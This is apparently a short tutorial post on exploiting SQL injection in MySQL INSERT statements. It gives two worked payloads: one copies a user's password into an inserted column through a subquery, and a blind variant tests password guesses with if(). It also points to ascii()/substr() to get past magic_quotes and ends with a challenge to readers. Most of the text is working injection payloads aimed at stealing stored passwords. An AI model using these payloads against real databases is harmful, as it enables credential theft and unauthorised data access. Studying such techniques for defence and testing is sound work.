Exploiting SQL Injections in Insert Statement, is not trivial as most of the times you do not directly see the output of the injected query.
Unlike MS-SQL, mysql 'generally' do not support use of multiple queries which is a common trick of exploiting SQL Injections when backend database is MS-SQL.
----------------------------------------------------
Example 1
Lets consider a vulnerable example, the injection point being $id (integer field) in the following statement:-
insert into secret values($id, 'Welcome');
----------------------------------------------------------- -----
Exploit
insert into secret values(1000, (select passwd from users where id=1))#, 'Welcome');
'#' comments out the rest of the query.
------------------------------------------------------------------
Example 2 Blind Injection
scenario:- injection is in last column of the query and is an integer field, hence an attacker can not directly select a password in an integer field
Query:- insert into secret values('WELCOME', $id);
EXPLOIT:-
insert into secret values('WELCOME', (select if (passwd ='mypass',1,0) from users where id=1))#);
--------------------------------------------------------------------------
If 'magic_quotes' is enabled then one can use functions like ascii() and substr() to exploit it.
Question:- Can you exploit the above (example.2), if $id happens to be a string field. Let us know How.!!.:)